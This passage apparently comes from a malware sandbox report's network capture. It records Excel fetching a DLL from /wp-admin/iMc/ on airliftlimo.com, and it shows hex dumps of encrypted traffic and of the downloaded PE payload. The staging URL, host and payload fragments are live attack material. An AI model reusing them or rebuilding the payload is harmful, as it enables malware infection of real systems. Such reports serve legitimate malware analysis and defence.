                                                2022-05-23 06:34:53 UTC309INData Raw: 31 31 35 62 0d 0a 28 07 f2 79 55 b8 37 74 65 a0 3f 14 1d 6e 94 d4 9f f1 cf 44 5b 2d 3e e6 7b 09 ba be e7 35 14 3c ad d5 1f db 6e 5f 6b 53 89 59 01 1b da b5 1e ae 84 70 49 da 5c ed 45 19 22 40 47 ea 06 5a 8c f3 4f 27 3f b4 79 5d 67 30 98 9a a0 0f 1c 62 23 ba 34 af 45 7e 1a fc f3 5e 89 51 7d 21 fd 2b 70 d3 be 52 a3 89 b9 28 a5 eb 81 4d a3 2b 6a d0 29 05 39 48 ca 8e eb 13 68 ec f3 92 87 e1 26 73 e9 71 4e b7 78 c7 c8 c3 24 ed 68 2e e6 e2 7e 6c aa f2 1e b5 af 45 7e b4 1b a1 5e 89 51 7d 3d f7 13 70 7b ff 5c fb d9 25 1b 83 86 4d da a1 23 6a 96 29 05 60 3c 7b 71 eb 13 68 e9 05 cb 27 eb 26 73 c5 e2 76 5f 24 38 9a fd 21 4f bb e6 10 11 1b fb b7 66 e0 6e 58 44 75 e1 64 ec f5 48 3c 4d f6 33 5e e7 40 e0 79 a8 3d 68 27 ee 6f 50 40 01 66 5a d0 19 0d 17 4b 7b 87 ad 23 68
                                                Data Ascii: 115b(yU7te?nD[->{5<n_kSYpI\E"@GZO'?y]g0b#4E~^Q}!+pR(M+j)9Hh&sqNx$h.~lE~^Q}=p{\%M#j)`<{qh'&sv_$8!OfnXDudH<M3^@y=h'oP@fZK{#h
                                                2022-05-23 06:34:53 UTC313INData Raw: 32 35 62 66 0d 0a c3 71 5d 89 e9 74 a4 0d a8 98 42 92 81 c2 6c e0 a9 a1 2f ef 17 41 ed 40 66 39 1c d6 6b a1 1d 5d c8 76 7c 6a e2 0e 7a cb 0b b4 9d f6 50 24 6e e5 1e 7f 33 cd 91 5f 19 b2 6e cc f3 00 4e ba 3e 72 d5 05 2c 00 ba f6 e6 42 24 5f 91 84 07 50 2b a8 6f 70 09 2c 6c 5a d0 29 2d 5b d2 35 71 eb 23 40 76 23 98 87 eb 16 5b 08 d9 7c 5f a2 72 25 d2 a7 59 6b a6 00 31 7c a5 20 29 7f 00 1d 0f c5 64 7b e1 13 50 70 c6 34 ec fd 40 24 17 fa ad 68 0d c2 43 26 68 48 a3 2a 7e 59 39 7d fd af 7d f2 86 06 9f 00 82 65 a6 66 63 70 a2 bd 33 ab a2 72 25 85 0d 5c 6b a6 00 31 6a a5 20 29 e5 15 17 4e c5 74 7b e3 1b a4 fb 08 21 db 7e 6b 24 de 3c 79 0c 45 2b 6f a1 25 58 92 a7 9a 91 ac c2 97 82 df 77 e3 33 48 c4 3f 77 bd d1 9b 90 e3 41 66 89 9c 3a ea b7 20 74 e2 22 8d e6 3f 0c
                                                Data Ascii: 25bfq]tBl/A@f9k]v|jzP$n3_nN>r,B$_P+op,lZ)-[5q#@v#[|_r%Yk1| )d{Pp4@$hC&hH*~Y9}}efcp3r%\k1j )Nt{!~k$<yE+o%Xw3H?wAf: t"?
                                                2022-05-23 06:34:53 UTC323INData Raw: 31 31 63 64 0d 0a a6 35 bd 29 40 2f 40 a3 dd e3 a5 21 1d 2f e1 bf f5 d7 ba 2f 4e 1a c3 78 69 71 9e 34 4f 24 5f 31 e0 5d 57 52 6f 2a 24 c3 e1 2a d1 94 e7 e3 3e c8 fa 39 e1 3a 7c 25 3a ec 14 4e 0b 0b e9 40 52 2f 2d b4 f1 6c 3a 2c 94 87 a9 a8 36 00 5d 6c 38 7d 3f 48 c3 9d 4f e2 a0 b7 c3 05 b0 9a 1e 42 24 5f f2 d4 f8 51 2b 6f 62 e3 fd 82 67 5a 51 5f fc ff 0f 11 2d d2 70 f5 41 72 a0 3c 4e 3b 90 24 3d 76 6c be 0a 51 46 64 64 64 e3 c1 25 7a 24 68 2f c6 2f 68 0f ca f2 68 6a 5e 75 98 0e 34 76 69 c4 ab 5c 79 69 65 17 f3 6a 2a 67 cc 64 64 5a 51 51 2e d8 45 35 7e ee 52 5a 45 72 5a d6 dc 65 43 6d b0 2b 5e 65 37 08 75 45 6f 6b 68 e1 5d 7e 24 55 04 65 f6 67 00 41 b4 0a 6e 5e 48 fb c8 99 77 66 40 c9 97 9d 69 33 d5 83 6e 2a 68 1a a3 e3 f2 50 6c 35 ce 98 b4 c8 1c e7 dd ed
                                                Data Ascii: 11cd5)@/@!//Nxiq4O$_1]WRo*$*>9:|%:N@R/-l:,6]l8}?HOB$_Q+obgZQ_-pAr<N;$=vlQFddd%z$h//hhj^u4vi\yiej*gddZQQ.E5~RZErZeCm+^e7uEokh]~$UegAn^Hwf@i3n*hPl5
                                                2022-05-23 06:34:53 UTC327INData Raw: 31 32 37 0d 0a 65 2e fe e7 57 39 6b 16 b2 c4 4c 31 64 ee 70 4a 3c 4d 0c bb 08 45 24 50 fd 9d 59 50 2b 52 ec 08 43 2a 69 de 17 6d 35 76 7e 26 06 61 66 57 c1 54 66 78 6a 5e 4c a0 39 76 50 e1 90 35 3c 65 59 1c 5b 6b 21 75 a1 bd 3b 6b 2b af 45 91 c9 33 5a 5e f0 05 cc 22 4e 2a cd 61 b8 f2 24 87 a7 ca 44 e0 b9 a1 29 ac 9b b8 6a bc 3b 9c b4 04 b5 df 8c 43 72 a0 3d bd 00 95 c3 34 b7 3a b2 32 b4 79 b2 ce 31 98 9a a0 0f f3 19 65 58 3f af 45 95 37 92 d0 5e c9 79 96 0b 8a 99 bf a5 12 a2 e8 6f 93 8c ee 5f b3 64 4d 90 fd 96 29 4a 2a 11 ff 71 eb 23 27 18 07 98 87 ab 06 3c 65 b5 03 20 14 45 d9 58 ee 21 14 ee 21 05 52 af 10 e2 2f a0 25 d7 c5 27 e0 27 81 c1 78 69 11 9e 2f 0d da a0 c1 66 9a 5d 2b 86 3d 97 b7 d5 a1 1f 2e e9 18 d2 43 7d fc 3c 5e 14 c8 3f 80 b9 07 1c 4b 09 71
                                                Data Ascii: 127e.W9kL1dpJ<ME$PYP+RC*im5v~&afWTfxj^L9vP5<eY[k!u;k+E3Z^"N*a$D)j;Cr=4:2y1eX?E7^yo_dM)J*q#'<e EX!!R/%''xi/f]+=.C}<^?Kq
                                                2022-05-23 06:34:53 UTC328INData Raw: 32 33 34 34 0d 0a 1f 86 31 16 1f 43 f4 1c bd 60 99 28 a5 6f f9 1f b4 10 5b 39 76 d4 20 e0 71 b7 20 bf e0 2a 1a a8 3e 00 75 d1 56 f4 96 ff f6 c6 35 68 5e a1 9f b3 ce 89 2e cb ea b7 a2 a0 a6 af a2 2c 22 d0 8e 4a 6d 5a b8 e2 cb 89 bc f2 34 b5 df cd 2e 72 df df 7a 0b 49 e9 79 a9 a8 84 1c ff ed 8c 67 a1 a6 8c 27 f3 69 8a b8 1e f4 bc 02 40 31 ac 2f 21 0a 12 ea 31 f7 23 3f 3f 6f 86 96 d9 15 54 02 1d 68 48 eb 0b 25 57 ed 40 09 03 8e 7e 6a a1 1d 9e 6a c4 d6 6a 08 06 b9 66 ff 1a be b6 78 e7 95 0c 74 40 e4 54 a1 a9 9a c2 5c ec 2d d7 ba 8b b7 6a 9f 2d eb 4b b0 33 b1 e0 ff 5f 79 e8 2d 87 81 5f 0e 5f c3 6f b1 d1 14 b7 be 33 3c be 34 b5 ed 13 4d 9a ce 5d 6a 63 0b eb 37 3e da a5 38 b1 09 64 64 6b df bf e5 78 24 bc d2 96 d4 97 48 c7 0a ac 2f 21 78 1a e7 31 f7 23 3f 93 39
                                                Data Ascii: 23441C`(o[9v q *>uV5h^.,"JmZ4.rzIyg'i@1/!1#??oThH%W@~jjjfxt@T\-j-K3_y-__o3<4M]jc7>8ddkx$H/!x1#?9
                                                2022-05-23 06:34:53 UTC336INData Raw: 65 61 38 0d 0a ec 2a 32 c8 e7 66 66 d1 1c 74 c2 97 82 df 77 e3 33 40 84 1f 7f 7d eb 16 5b ff c6 7a 5f 29 bc 30 35 25 64 6b ec 30 39 f1 69 75 74 e0 ab e8 02 4e 31 83 65 5a 48 3c f5 cb 6c 6a 40 cd eb 85 96 a7 97 6e 47 29 a2 b6 2a de 17 c0 a3 8f f7 06 1d 3f 8f 99 a7 c4 07 4f 00 b9 57 f9 e3 41 5e c4 03 f2 8f fb 20 44 8b b2 35 21 f1 69 75 ce 8a 00 a2 d1 a7 32 a1 ab b7 4d b5 00 11 f7 23 60 c9 ea 86 96 d9 15 0b 7d b1 68 48 ab 13 7a f7 08 34 76 84 70 69 72 5c 65 45 f3 2a 60 39 ce af 4d b5 33 47 d0 b0 35 3c e4 11 73 e5 32 d2 55 af 10 21 2f a0 2d 20 c5 64 43 e3 1a 6c 0c 8a 75 52 46 41 24 5f 79 81 70 b7 d5 90 62 e3 80 62 ed 5f 0f 53 35 76 0b bc 39 52 2e dd 8c 07 76 c0 d4 98 42 62 09 66 5e 67 37 41 36 8c 6f 97 98 9a 9a 7b 24 55 39 e0 e8 20 83 8a 79 30 37 9d 84 f0 c4
                                                Data Ascii: ea8*2fftw3@}[z_)05%dk09iutN1eZH<lj@nG)*?OWA^ D5!iu2M#`}hHz4vpir\eE*`9M3G5<s2U!/- dCluRFA$_ypbb_S5v9R.vBbf^g7A6o{$U9 y07
                                                2022-05-23 06:34:53 UTC340INData Raw: 31 31 36 66 0d 0a c5 e7 ea 2e 7a 38 26 6d 31 76 e7 0c 00 2f 03 b5 0e 25 aa 2b 0e 18 0c 49 66 5a d0 18 11 06 01 d5 06 1f a1 1c 61 06 85 55 f1 63 c2 16 10 02 64 fc 47 54 bd 21 40 1f f7 5e de 85 a5 21 1d 1f 1d ef ee 2f 75 e0 26 7a 3c b7 01 15 06 8e bd 65 a1 86 ec 98 24 22 5c dc d3 55 6e 6b 5a ba 69 8e 93 ca 3e 71 ad 22 7c 35 94 08 fd 6a e2 37 46 44 0d a2 9a 6c b4 70 41 14 9d dc a3 d7 bb 40 71 49 65 aa 1c 24 3e d3 e0 9e f0 8f 79 cd 4d fd 11 40 e5 32 f9 79 d9 25 ab 6f 30 6b 48 66 ed 1f 91 e7 60 f6 c8 79 55 1a 8e 20 e4 8d 98 f9 91 7e 07 6f 34 02 55 8c 0b cd c3 9a da 69 67 65 21 36 a9 c9 1d bb 2a 68 00 c5 f7 22 e1 05 78 75 c6 42 4e 2f cb 5f 1f 30 e2 bb 11 74 2e 74 29 15 6b 3a 07 92 a0 f9 ba 0b be b5 22 ef 00 4d 3a ee 10 7a 2b ca 12 2c 21 17 e6 db 65 78 ee f0 4f
                                                Data Ascii: 116f.z8&m1v/%+IfZaUcdGT!@^!/u&z<e$"\UnkZi>q"|5j7FDlpA@qIe$>yM@2y%o0kHf`yU ~o4Uige!6*h"xuBN/_0t.t)k:"M:z+,!exO
                                                2022-05-23 06:34:53 UTC345INData Raw: 33 35 30 65 0d 0a ef 71 91 9e 08 fc 31 bd 10 af 66 94 60 21 bd 61 2a 33 28 e4 68 81 03 4e fe b9 80 0e fd 20 4e 70 e7 35 5b 42 75 75 59 97 6e a8 77 ce f9 2a e7 1f 96 a6 07 89 bc b4 04 ad 6a 0f f5 72 a0 3d a5 ea 80 0e 34 b7 32 aa 33 b4 49 aa 6c 30 6e 65 aa 3f eb dc 7d 4f 03 e3 45 89 75 e0 27 21 c3 6a 21 ba 3b ad c9 60 7b 59 81 6f 59 d5 90 92 ca 50 2a 66 b3 e0 92 ca 89 84 70 b6 9d 13 98 45 ca fa fa fd 30 0f ef 71 91 9e 08 f0 3e bd 10 a3 ad 1e ec 13 fb 51 92 a8 ac a0 5a c7 0b fa b3 53 59 48 b7 00 fa 81 87 f8 b9 dd ee 3a 99 ba 2f e6 7f a3 c9 5f ad 7c f2 65 35 b1 06 fa 60 5a d9 58 ce 3f a8 8f 8b a2 a9 67 bd 23 90 e4 42 fa 0c 70 6a 6b a0 20 5e 58 4b 39 39 00 6e 17 57 c7 74 14 eb 1b 37 77 fc ce 89 ed 05 5b 9e 99 6d d1 15 54 ee 5f 17 6d 4b f9 17 da 29 4a ff 07 11
                                                Data Ascii: 350eq1f`!a*3(hN Np5[BuuYnw*jr=423Il0ne?}OEu'!j!;`{YoYP*fpE0q>QZSYH:/_|e5`ZX?g#Bpjk ^XK99nWt7w[mT_mK)J
                                                2022-05-23 06:34:53 UTC358INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249176159.203.19.2443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                TimestampkBytes transferredDirectionData
                                                2022-05-23 06:35:00 UTC358OUTGET /wp-admin/iMc/ HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: airliftlimo.com
                                                Connection: Keep-Alive
                                                2022-05-23 06:35:00 UTC358INHTTP/1.1 200 OK
                                                Date: Mon, 23 May 2022 06:34:56 GMT
                                                Server: Apache/2
                                                Set-Cookie: 628b2b108ba3a=1653287696; expires=Mon, 23-May-2022 06:35:56 GMT; Max-Age=60; path=/
                                                Cache-Control: no-cache, must-revalidate
                                                Pragma: no-cache
                                                Last-Modified: Mon, 23 May 2022 06:34:56 GMT
                                                Expires: Mon, 23 May 2022 06:34:56 GMT
                                                Content-Disposition: attachment; filename="klJrMZJhgldiJr6j0XWPeZOiGs.dll"
                                                Content-Transfer-Encoding: binary
                                                Content-Length: 365056
                                                Vary: Accept-Encoding,User-Agent
                                                Connection: close
                                                Content-Type: application/x-msdownload
                                                2022-05-23 06:35:00 UTC359INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b"
                                                2022-05-23 06:35:00 UTC366INData Raw: df c7 85 b4 08 00 00 65 37 35 d7 c7 85 b8 08 00 00 40 20 e0 e2 c7 85 bc 08 00 00 7d 20 7a 24 c7 85 c0 08 00 00 be 1a ee e2 c7 85 c4 08 00 00 1d 06 0a bc c7 85 c8 08 00 00 2a 4a b5 5a c7 85 cc 08 00 00 78 c6 b4 6e c7 85 d0 08 00 00 67 40 24 da c7 85 d4 08 00 00 b0 d1 18 50 c7 85 d8 08 00 00 2b 6f 6e 67 c7 85 dc 08 00 00 0d ea 22 d3 c7 85 e0 08 00 00 d4 74 34 76 c7 85 e4 08 00 00 43 c2 77 6a c7 85 e8 08 00 00 66 58 41 06 c7 85 ec 08 00 00 6b 39 65 d9 c7 85 f0 08 00 00 ab 6b 70 ff c7 85 f4 08 00 00 da 7d 36 35 c7 85 f8 08 00 00 3c ee 2a 83 c7 85 fc 08 00 00 2b e8 ac 62 c7 85 00 09 00 00 25 55 39 e0 c7 85 04 09 00 00 7d 84 48 4d c7 85 08 09 00 00 fa 94 3f 6e c7 85 0c 09 00 00 47 8b 0a 37 c7 85 10 09 00 00 33 65 b4 6c c7 85 14 09 00 00 dc bf 41 1c c7 85 18 09
                                                Data Ascii: e75@ } z$*JZxng@$P+ong"t4vCwjfXAk9ekp}65<*+b%U9}HM?nG73elA
                                                2022-05-23 06:35:00 UTC382INData Raw: 75 03 cc 33 c0 48 8b 44 24 40 8b 40 28 89 44 24 28 48 8d 05 5d c9 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 f5 42 00 00 83 f8 01 75 03 cc 33 c0 48 8b 44 24 40 8b 40 1c 25 ff ff 00 00 83 f8 04 0f 85 a9 00 00 00 48 8b 44 24 40 8b 40 1c c1 f8 10 25 ff ff 00 00 48 8b 4c 24 40 48 83 c1 30 48 8b 54 24 40 48 8b 52 20 48 89 54 24 38 89 44 24 30 48 89 4c 24 28 48 8d 05 c0 c8 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 8c 42 00 00 83 f8 01 75 03 cc 33 c0 48 83 3d 04 5f 02 00 00 74 38 48 8b 44 24 40 48 83 c0 30 ba 01 00 00 00 48 8b c8 ff 15 4b b6 01 00 85 c0 75 1d 48 8b 44 24 40 48 83 c0 30 48 8b 4c 24 40 48 8b 51 20 48 8b c8 ff 15 cc 5e 02 00 eb 0f 48 8b 54 24 40 48 8b 4c 24 68 e8 23 01 00 00 e9 cf 00 00 00 48 8b 44 24 40 83 78 1c 01 75 50 48
                                                Data Ascii: u3HD$@@(D$(H]HD$ E3E333Bu3HD$@@%HD$@@%HL$@H0HT$@HR HT$8D$0HL$(HHD$ E3E333Bu3H=_t8HD$@H0HKuHD$@H0HL$@HQ H^HT$@HL$h#HD$@xuPH
                                                2022-05-23 06:35:00 UTC398INData Raw: 44 0a 1c 8b 84 24 70 05 00 00 83 e8 20 8b 8c 24 70 05 00 00 48 8b 94 24 b0 05 00 00 88 84 0a 1d 01 00 00 eb 17 8b 84 24 70 05 00 00 48 8b 8c 24 b0 05 00 00 c6 84 01 1d 01 00 00 00 e9 f3 fe ff ff 48 8b 8c 24 90 05 00 00 48 33 cc e8 50 88 ff ff 48 81 c4 a8 05 00 00 c3 cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 2d 3d 02 00 00 75 14 b9 fd ff ff ff e8 b9 f1 ff ff c7 05 17 3d 02 00 01 00 00 00 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 e8 e3 00 00 00 8b 4c 24 40 89 08 8b 4c 24 40 e8 14 00 00 00 89 44 24 20 e8 9b 00 00 00 8b 4c 24 20 89 08 48 83 c4 38 c3 89 4c 24 08 48 83 ec 18 c7 04 24 00 00 00 00 eb 08 8b 04 24 ff c0 89 04 24 48 63 04 24 48 83 f8 2d 73 27 48 63 04 24 48 8d 0d 92 11 02 00 8b 04 c1 39 44 24 20 75 11 48 63 04 24 48 8d 0d
                                                Data Ascii: D$p $pH$$pH$H$H3PHH(=-=u=3H(L$H8L$@L$@D$ L$ H8L$H$$$Hc$H-s'Hc$H9D$ uHc$H
                                                2022-05-23 06:35:00 UTC414INData Raw: 84 24 90 00 00 00 48 89 44 24 48 e8 11 56 ff ff 48 8b 80 e0 00 00 00 48 89 44 24 58 48 8d 54 24 40 48 8b 84 24 80 00 00 00 8b 08 ff 54 24 58 c7 44 24 50 00 00 00 00 eb 00 8b 44 24 50 48 83 c4 78 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 48 c7 44 24 38 00 00 00 00 48 8b 44 24 58 8b 40 0c 89 44 24 28 48 8b 94 24 80 00 00 00 48 8b 4c 24 58 e8 d1 50 00 00 89 44 24 30 83 7c 24 28 00 76 02 eb 05 e8 ff e4 ff ff 48 8b 44 24 78 c7 00 ff ff ff ff 48 8b 44 24 70 c7 00 ff ff ff ff 8b 44 24 28 89 44 24 2c eb 0a 8b 44 24 2c ff c8 89 44 24 2c 83 7c 24 2c 00 76 4f 48 8b 44 24 58 48 63 40 10 48 8b 8c 24 80 00 00 00 48 8b 49 08 48 03 c8 48 8b c1 8b 4c 24 2c ff c9 8b c9 48 6b c9 14 48 03 c1 48 89
                                                Data Ascii: $HD$HVHHD$XHT$@H$T$XD$PD$PHxDL$ DD$HT$HL$HHHD$8HD$X@D$(H$HL$XPD$0|$(vHD$xHD$pD$(D$,D$,D$,|$,vOHD$XHc@H$HIHHL$,HkHH
                                                2022-05-23 06:35:00 UTC430INData Raw: 00 00 00 00 8b 44 24 60 89 44 24 40 83 7c 24 40 00 75 2e 48 8d 05 a7 4a 01 00 48 89 44 24 20 45 33 c9 41 b8 42 01 00 00 48 8d 15 b2 49 01 00 b9 02 00 00 00 e8 98 89 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 40 00 75 3e e8 04 81 ff ff c7 00 22 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 42 01 00 00 4c 8d 05 78 49 01 00 48 8d 15 09 4b 01 00 48 8d 0d 4a 4a 01 00 e8 15 93 ff ff b8 ff ff ff ff e9 ca 00 00 00 b8 ff ff ff ff e9 c0 00 00 00 48 83 bc 24 98 00 00 00 ff 0f 84 94 00 00 00 48 81 bc 24 98 00 00 00 ff ff ff 7f 0f 84 82 00 00 00 8b 44 24 30 ff c0 48 98 48 3b 84 24 98 00 00 00 73 70 8b 44 24 30 ff c0 48 98 48 8b 8c 24 98 00 00 00 48 2b c8 48 8b c1 48 39 05 81 85 01 00 73 0e 48 8b 05 78 85 01 00 48 89 44 24 68 eb 1b 8b 44 24 30 ff c0 48 98 48 8b 8c 24 98 00 00
                                                Data Ascii: D$`D$@|$@u.HJHD$ E3ABHIu3|$@u>"HD$ ABLxIHKHJJH$H$D$0HH;$spD$0HH$H+HH9sHxHD$hD$0HH$
                                                2022-05-23 06:35:01 UTC446INData Raw: 74 15 48 83 bc 24 a8 00 00 00 00 76 0a c7 44 24 50 01 00 00 00 eb 08 c7 44 24 50 00 00 00 00 8b 44 24 50 89 44 24 40 83 7c 24 40 00 75 2e 48 8d 05 8c ed 00 00 48 89 44 24 20 45 33 c9 41 b8 12 00 00 00 48 8d 15 67 0d 01 00 b9 02 00 00 00 e8 7d 49 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 40 00 75 3e e8 e9 40 ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 12 00 00 00 4c 8d 05 2d 0d 01 00 48 8d 15 26 10 01 00 48 8d 0d 2f ed 00 00 e8 fa 52 ff ff b8 16 00 00 00 e9 1a 05 00 00 48 83 bc 24 b0 00 00 00 00 0f 85 1d 01 00 00 48 8b 84 24 a0 00 00 00 c6 00 00 48 83 bc 24 a8 00 00 00 ff 74 68 48 81 bc 24 a8 00 00 00 ff ff ff 7f 74 5a 48 83 bc 24 a8 00 00 00 01 76 4f 48 8b 84 24 a8 00 00 00 48 ff c8 48 39 05 70 45 01 00 73 0e 48 8b 05 67 45 01 00 48 89 44 24 58
                                                Data Ascii: tH$vD$PD$PD$PD$@|$@u.HHD$ E3AHg}Iu3|$@u>@HD$ AL-H&H/RH$H$H$thH$tZH$vOH$HH9pEsHgEHD$X
                                                2022-05-23 06:35:01 UTC462INData Raw: 24 40 2b c8 8b c1 48 8b 8c 24 70 3d 00 00 48 33 cc e8 8b 88 fe ff 48 81 c4 88 3d 00 00 c3 cc cc cc 48 89 4c 24 08 48 83 ec 48 48 83 7c 24 50 00 75 2e 48 8d 05 b8 c6 00 00 48 89 44 24 20 45 33 c9 41 b8 2e 00 00 00 48 8d 15 b3 d7 00 00 b9 02 00 00 00 e8 79 09 ff ff 83 f8 01 75 03 cc 33 c0 8b 05 1f 2a 01 00 ff c0 89 05 17 2a 01 00 48 8b 44 24 50 48 89 44 24 30 41 b9 3a 00 00 00 4c 8d 05 44 d7 00 00 ba 02 00 00 00 b9 00 10 00 00 e8 1d 98 fe ff 48 89 44 24 38 48 8b 44 24 30 48 8b 4c 24 38 48 89 48 10 48 83 7c 24 38 00 74 21 48 8b 44 24 30 8b 40 18 83 c8 08 48 8b 4c 24 30 89 41 18 48 8b 44 24 30 c7 40 24 00 10 00 00 eb 31 48 8b 44 24 30 8b 40 18 83 c8 04 48 8b 4c 24 30 89 41 18 48 8b 44 24 30 48 83 c0 20 48 8b 4c 24 30 48 89 41 10 48 8b 44 24 30 c7 40 24 02 00
                                                Data Ascii: $@+H$p=H3H=HL$HHH|$Pu.HHD$ E3A.Hyu3**HD$PHD$0A:LDHD$8HD$0HL$8HHH|$8t!HD$0@HL$0AHD$0@$1HD$0@HL$0AHD$0H HL$0HAHD$0@$
                                                2022-05-23 06:35:01 UTC478INData Raw: 44 24 40 48 ff c0 48 89 44 24 40 8b 44 24 50 25 00 02 00 00 85 c0 74 33 83 7c 24 68 00 74 0d 48 8b 44 24 40 0f be 00 83 f8 30 74 1f 48 8b 44 24 40 48 ff c8 48 89 44 24 40 48 8b 44 24 40 c6 00 30 8b 44 24 68 ff c0 89 44 24 68 83 7c 24 6c 00 0f 85 47 02 00 00 8b 44 24 50 83 e0 40 85 c0 74 5d 8b 44 24 50 25 00 01 00 00 85 c0 74 14 b8 2d 00 00 00 66 89 44 24 54 c7 44 24 5c 01 00 00 00 eb 3c 8b 44 24 50 83 e0 01 85 c0 74 14 b8 2b 00 00 00 66 89 44 24 54 c7 44 24 5c 01 00 00 00 eb 1d 8b 44 24 50 83 e0 02 85 c0 74 12 b8 20 00 00 00 66 89 44 24 54 c7 44 24 5c 01 00 00 00 8b 44 24 68 8b 4c 24 58 2b c8 8b c1 2b 44 24 5c 89 84 24 28 05 00 00 8b 44 24 50 83 e0 0c 85 c0 75 20 4c 8d 8c 24 b0 04 00 00 4c 8b 84 24 00 06 00 00 8b 94 24 28 05 00 00 66 b9 20 00 e8 e1 03 00
                                                Data Ascii: D$@HHD$@D$P%t3|$htHD$@0tHD$@HHD$@HD$@0D$hD$h|$lGD$P@t]D$P%t-fD$TD$\<D$Pt+fD$TD$\D$Pt fD$TD$\D$hL$X++D$\$(D$Pu L$L$$(f
                                                2022-05-23 06:35:01 UTC494INData Raw: 00 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 09 00 00 00 c0 00 00 00 0c 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 36 34 5f 61 6d 64 36 34 5c 63 72 74 5c 73 72 63 5c 6d 6c
                                                Data Ascii: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ml
                                                2022-05-23 06:35:01 UTC510INData Raw: 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 00 3d 00 00 00 00 00 00 00 5f 00 73 00 65 00 74 00 5f 00 65 00 72 00 72 00 6f 00 72 00 5f 00 6d 00 6f 00 64 00 65 00 00 00 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 65 00 72 00 72 00 6d 00 6f 00 64 00 65 00 2e 00 63 00 00 00 00 00 00 00 28 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 65 00 72 00 72 00 6f 00 72 00 5f 00 6d 00 6f 00 64 00 65 00 22 00 2c 00 20 00 30 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: `abcdefghijklmnopqrstuvwxyz{|}~=_set_error_modef:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c("Invalid error_mode", 0)
